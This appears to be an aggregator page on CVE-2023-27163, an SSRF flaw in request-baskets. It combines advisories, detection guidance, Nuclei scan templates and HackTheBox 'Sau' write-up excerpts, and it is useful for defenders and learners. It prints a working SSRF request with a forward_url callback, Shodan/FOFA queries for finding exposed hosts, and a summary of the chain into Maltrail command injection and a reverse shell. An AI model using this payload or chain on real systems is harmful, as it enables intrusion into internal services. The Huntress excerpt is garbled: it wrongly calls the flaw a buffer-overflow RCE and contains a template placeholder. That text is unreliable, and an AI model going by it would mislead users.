CVE-2023-27163
published 2023-03-31CVE-2023-27163: request-baskets up to v1.2.1 was discovered to contain a Server-Side Request Forgery (SSRF) via the component /api/baskets/{name}. This vulnerability allows…
PriorityP274medium6.5CVSS 3.1
AVNACLPRHUINSUCHIHAN
ITWEXPLOITVulnCheck KEVInitial access
Exploited in the wild
EPSS
7.50%
93.7th percentile
request-baskets up to v1.2.1 was discovered to contain a Server-Side Request Forgery (SSRF) via the component /api/baskets/{name}. This vulnerability allows attackers to access network resources and sensitive information via a crafted API request.
Affected
2 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| github.com | darklynx_request-baskets | 0 – 1.2.1 | — |
| rbaskets | request_baskets | <= 1.2.1 | — |
Detection & IOCsextracted from sources · hover to see the quote
commandPOST /api/baskets/{{bucketname}} HTTP/1.1
Host: {{Hostname}}
Content-Type: application/json
{
"forward_url": "http://{{interactsh-url}}",
"proxy_response": true,
"insecure_tls": false,
"expand_path": true,
"capacity": 250
}
othershodan-query: http.html:"Request-Baskets"
otherfofa-query: body="Request-Baskets"
path/web
sigma
id: CVE-2023-27163
info:
name: Request-Baskets <= 1.2.1 - Server Side Request Forgery
author: Jaenact
severity: medium
description: |
Request-Baskets <= 1.2.1 allows unauthenticated SSRF via the forward_url parameter when creating a new basket.
tags: cve,cve2023,ssrf,request-baskets,oast,proxy,vkev,vuln- →Detect SSRF exploitation attempts by monitoring POST requests to /api/baskets/{name} containing a forward_url parameter pointing to internal/loopback addresses (e.g., 127.0.0.1, 169.254.x.x, 10.x.x.x). ↗
- →Monitor for POST requests to /api/baskets/* with a JSON body containing "forward_url" set to internal RFC-1918 or loopback addresses, combined with "proxy_response": true. ↗
- →Detect chained Maltrail command injection by monitoring POST requests to /login with a username parameter containing shell metacharacters (backtick or semicolon-prefixed commands). ↗
- →Use Shodan/FOFA to identify exposed request-baskets instances by searching for the string 'Request-Baskets' in HTTP response bodies, then prioritize patching those on version <= 1.2.1.
- →Monitor for the presence of 'Request Baskets' in HTTP response bodies at the /web endpoint as an indicator of an exposed and potentially vulnerable instance.
- ·The Nuclei template for CVE-2023-27163 uses a randomly generated bucket name (rand_base(7)) for each scan, so static basket name IOCs are not reliable for detection; focus on the forward_url parameter content instead.
- ·The SSRF can be chained with other vulnerabilities on internal services (e.g., Maltrail unauthenticated OS command injection); detection must cover both the initial SSRF basket creation and subsequent forwarded requests to internal endpoints like /login. ↗
- ·The vulnerability is exploitable without authentication; any network-accessible request-baskets instance on version <= 1.2.1 is at risk regardless of authentication controls on other endpoints.
CVSS provenance
nvdv3.16.5MEDIUMCVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:N
vulncheck6.5MEDIUM
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
OSV
request-baskets vulnerable to Server-Side Request Forgery
osv·2023-03-31
CVE-2023-27163 [MEDIUM] request-baskets vulnerable to Server-Side Request Forgery
request-baskets vulnerable to Server-Side Request Forgery
request-baskets up to v1.2.1 was discovered to contain a Server-Side Request Forgery (SSRF) via the component /api/baskets/{name}. This vulnerability allows attackers to access network resources and sensitive information via a crafted API request.
GHSA
request-baskets vulnerable to Server-Side Request Forgery
ghsa·2023-03-31
CVE-2023-27163 [MEDIUM] CWE-918 request-baskets vulnerable to Server-Side Request Forgery
request-baskets vulnerable to Server-Side Request Forgery
request-baskets up to v1.2.1 was discovered to contain a Server-Side Request Forgery (SSRF) via the component /api/baskets/{name}. This vulnerability allows attackers to access network resources and sensitive information via a crafted API request.
VulnCheck
rbaskets request_baskets Server-Side Request Forgery (SSRF)
vulncheck·2023·CVSS 6.5
CVE-2023-27163 [MEDIUM] rbaskets request_baskets Server-Side Request Forgery (SSRF)
rbaskets request_baskets Server-Side Request Forgery (SSRF)
request-baskets up to v1.2.1 was discovered to contain a Server-Side Request Forgery (SSRF) via the component /api/baskets/{name}. This vulnerability allows attackers to access network resources and sensitive information via a crafted API request.
Affected: rbaskets request_baskets
Required Action: Apply remediations or mitigations per vendor instructions or discontinue use of the product if remediation or mitigations are unavailable.
Exploitation References: https://dashboard.shadowserver.org/statistics/honeypot/vulnerability/map/?day=2025-10-13&host_type=src&vulnerability=cve-2023-27163; https://dashboard.shadowserver.org/statistics/honeypot/vulnerability/map/?day=2025-10-16&host_type=src&vulnerability=cve-2023-27163; https:
No detection rules found.
Nuclei
Request Baskets - Exposure
nuclei·CVSS 6.5
CVE-2023-27163 [MEDIUM] Request Baskets - Exposure
Request Baskets - Exposure
Request Baskets is exposed.
Template:
id: request-baskets-exposure
info:
name: Request Baskets - Exposure
author: DhiyaneshDk
severity: low
description: Request Baskets is exposed.
reference:
- https://notes.sjtu.edu.cn/s/MUUhEymt7#
- https://github.com/entr0pie/CVE-2023-27163
classification:
cpe: cpe:2.3:a:rbaskets:request_baskets:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
vendor: rbaskets
product: request_baskets
shodan-query: html:"request-baskets"
tags: misconfig,requests-baskets,exposure,vuln
http:
- method: GET
path:
- "{{BaseURL}}/web"
matchers-condition: and
matchers:
- type: word
part: body
words:
- 'Request Baskets'
- type: word
part: header
words:
- text/html
- type: status
status:
- 200
# digest: 4a0a00473045022100bbcb1e40f0600527
Nuclei
Request-Baskets <= 1.2.1 - Server Side Request Forgery
nuclei·CVSS 6.5
CVE-2023-27163 [MEDIUM] Request-Baskets <= 1.2.1 - Server Side Request Forgery
Request-Baskets <= 1.2.1 - Server Side Request Forgery
Request-Baskets <= 1.2.1 allows unauthenticated SSRF via the forward_url parameter when creating a new basket.
Template:
id: CVE-2023-27163
info:
name: Request-Baskets <= 1.2.1 - Server Side Request Forgery
author: Jaenact
severity: medium
description: |
Request-Baskets <= 1.2.1 allows unauthenticated SSRF via the forward_url parameter when creating a new basket.
impact: |
Attackers can perform SSRF attacks to access internal network resources, scan internal systems, or interact with services that should not be accessible from external networks.
remediation: |
Upgrade to Request-Baskets version 1.2.2 or later that addresses this SSRF vulnerability.
reference:
- https://github.com/darklynx/request-baskets
- https://hub.docker.com/r/
CTF
Sau / README
ctf_writeups·CVSS 6.5
CVE-2023-27163 [MEDIUM] Sau / README
# Sau - HackTheBox - Writeup
Linux, 20 Base Points, Easy
## Machine
## TL;DR
To solve this machine, we start by using `nmap` to enumerate open services and find ports `22`, and `55555`.
***User***: Discovered `request-baskets` running on port `55555`. Leveraging `CVE-2023-27163`, a new basket was created with forwarding to local port `80` for `Maltrail`. Exploiting unauthenticated OS Command Injection on `Maltrail`, a reverse shell was successfully obtained as user `puma`.
***Root***: After executing `sudo -l`, we discovered that we have the ability to run the `systemctl status` command as `root`. By utilizing the `!sh` command within the `less` pager, we successfully obtained a `root` shell.
## Sau Solution
### User
Let's begin by using `nmap` to scan the target machine:
```c
CTF
easy / README
ctf_writeups·CVSS 6.0
[MEDIUM] easy / README
---
layout: default
title: Easy Machines
parent: Machines
nav_order: 1
description: "120+ Easy HTB machine writeups with walkthroughs"
permalink: /machines/easy/
---
# HackTheBox Easy Machines - Comprehensive Reference
> Complete catalog of retired HTB Easy machines with OS, key vulnerability, attack path summary, and quality writeup links.
**Total: 100+ Easy Machines** | Updated: April 2026
---
## Quick Navigation
- [Classic / Legacy Machines (2017-2019)](#classic--legacy-machines-2017-2019)
- [2019-2020 Machines](#2019-2020-machines)
- [2021 Machines](#2021-machines)
- [2022 Machines](#2022-machines)
- [2023 Machines](#2023-machines)
- [2024 Machines (Season 4 & 5)](#2024-machines-season-4--5)
- [2025-2026 Machines (Season 6+)](#2025-2026-machines-season-6)
---
## Classic / Legac
Huntress
CVE-2023-27163 Vulnerability: Analysis, Impact, Mitigation | Huntress
blogs_huntress·CVSS 6.5
CVE-2023-27163 [MEDIUM] CVE-2023-27163 Vulnerability: Analysis, Impact, Mitigation | Huntress
## CVE-2023-27163 Vulnerability
Published: 12/05/2025
Written by: Lizzie Danielson
## What is CVE-2023-27163 Vulnerability?
CVE-2023-27163 is a critical remote code execution (RCE) vulnerability affecting a weakness enumeration for this vulnerability is categorized as CWE-918, which is a Server-Side Request Forgery (SSRF) issue in request-baskets software up to version 1.2.1.
## When was it discovered?
CVE-2023-27163 was publicly disclosed on March 2023.
## CVE-2023-27163 Technical Description
At its core, CVE-2023-27163 is rooted in a memory management flaw in [specific code component]. Attackers exploit this by sending specially crafted requests to a vulnerable endpoint, causing buffer overflow and enabling RCE. Below is an example of a vulnerable request:
GET /vulnerable-endpoi
Greynoiseio
NoiseLetter December 2025
blogs_greynoiseio·CVSS 10.0
[CRITICAL] NoiseLetter December 2025
CVE Disclosure Early Warning Get an early warning when traffic spikes indicate a high likelihood of new disclosures
Compromised Asset Detection Find out immediately if an asset communicates with a malicious IP address
Vulnerability Prioritization Get real-time insight into active exploitation trends to better understand risk and severity
SOC Efficiency Filter out noisy, low priority and false-positive alerts from mass internet scanners
Incident Investigation Add context to incidents to speed the determinations of scope and timelines
Threat Hunting Quickly identify anomalous behavior and enrich your threat hunting campaigns
Why GreyNoise
CVE Disclosure Early Warning Get an early warning when traffic spikes indicate a high likelihood of new disclosures
Compromised Asset Detection Fin
http://packetstormsecurity.com/files/174128/Request-Baskets-1.2.1-Server-Side-Request-Forgery.htmlhttp://packetstormsecurity.com/files/174129/Maltrail-0.53-Remote-Code-Execution.htmlhttp://request-baskets.comhttps://gist.github.com/b33t1e/3079c10c88cad379fb166c389ce3b7b3https://github.com/darklynx/request-basketshttps://notes.sjtu.edu.cn/s/MUUhEymt7http://packetstormsecurity.com/files/174128/Request-Baskets-1.2.1-Server-Side-Request-Forgery.htmlhttp://packetstormsecurity.com/files/174129/Maltrail-0.53-Remote-Code-Execution.htmlhttp://request-baskets.comhttps://gist.github.com/b33t1e/3079c10c88cad379fb166c389ce3b7b3https://github.com/darklynx/request-basketshttps://notes.sjtu.edu.cn/s/MUUhEymt7
2023-03-31
Published
Exploited in the wild